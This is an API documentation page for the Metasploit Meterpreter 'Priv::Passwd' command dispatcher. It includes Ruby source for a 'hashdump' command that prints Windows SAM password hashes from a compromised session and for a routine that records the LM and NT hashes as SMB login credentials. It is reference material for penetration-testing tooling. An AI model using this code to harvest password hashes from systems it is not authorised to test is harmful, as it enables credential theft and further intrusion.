Class: Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Priv::Passwd

Inherits:

Object

• Object
• Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Priv::Passwd

Includes:

Rex::Post::Meterpreter::Ui::Console::CommandDispatcher

Defined in:

lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb

Overview

The password database portion of the privilege escalation extension.

Constant Summary

Klass =

Console::CommandDispatcher::Priv::Passwd

Instance Attribute Summary

Attributes included from Ui::Text::DispatcherShell::CommandDispatcher

#shell, #tab_complete_items

Instance Method Summary

• #cmd_hashdump(*args) ⇒ Object

  Displays the contents of the SAM database.

• #commands ⇒ Object

  List of supported commands.

• #name ⇒ Object

  Name for this dispatcher.

• #report_creds(user_data) ⇒ Object

Methods included from Rex::Post::Meterpreter::Ui::Console::CommandDispatcher

check_hash, #client, #docs_dir, #filter_commands, #initialize, #log_error, #msf_loaded?, set_hash, #unknown_command

Methods included from Ui::Text::DispatcherShell::CommandDispatcher

#cmd_help, #cmd_help_help, #cmd_help_tabs, #deprecated_cmd, #deprecated_commands, #deprecated_help, #docs_dir, #help_to_s, included, #initialize, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #tab_complete_directory, #tab_complete_filenames, #tab_complete_generic, #tab_complete_source_address, #unknown_command, #update_prompt

Instance Method Details

#cmd_hashdump(*args) ⇒ Object

Displays the contents of the SAM database

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb', line 39

def cmd_hashdump(*args)
  client.priv.sam_hashes.each { |user|
    print_line("#{user}")
    if shell.client.platform == 'windows' && !shell.framework.nil? && shell.framework.db.active
      report_creds(user)
    end
  }

  return true
end

#commands ⇒ Object

List of supported commands.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb', line 23

def commands
  {
    'hashdump' => 'Dumps the contents of the SAM database'
  }
end

#name ⇒ Object

Name for this dispatcher.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb', line 32

def name
  'Priv: Password database'
end

#report_creds(user_data) ⇒ Object

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb', line 50

def report_creds(user_data)
  user = user_data.user_name
  lm_hash = user_data.lanman.downcase
  nt_hash = user_data.ntlm.downcase
  empty_password = lm_hash == Metasploit::Credential::NTLMHash::BLANK_LM_HASH && nt_hash == Metasploit::Credential::NTLMHash::BLANK_NT_HASH
  return if (user.empty? || empty_password)

  # Assemble data about the credential objects we will be creating
  credential_data = {
    origin_type: :session,
    post_reference_name: 'hashdump',
    private_data: "#{lm_hash}:#{nt_hash}",
    private_type: :ntlm_hash,
    session_id: client.db_record.id,
    username: user,
    workspace_id: shell.framework.db.workspace.id
  }

  credential_core = shell.framework.db.create_credential(credential_data)

  # Assemble the options hash for creating the Metasploit::Credential::Login object
  login_data = {
    core: credential_core,
    status: Metasploit::Model::Login::Status::UNTRIED,
    address: ::Rex::Socket.getaddress(client.sock.peerhost, true),
    port: 445,
    service_name: 'smb',
    protocol: 'tcp',
    workspace_id: shell.framework.db.workspace.id
  }

  shell.framework.db.create_credential_login(login_data)
end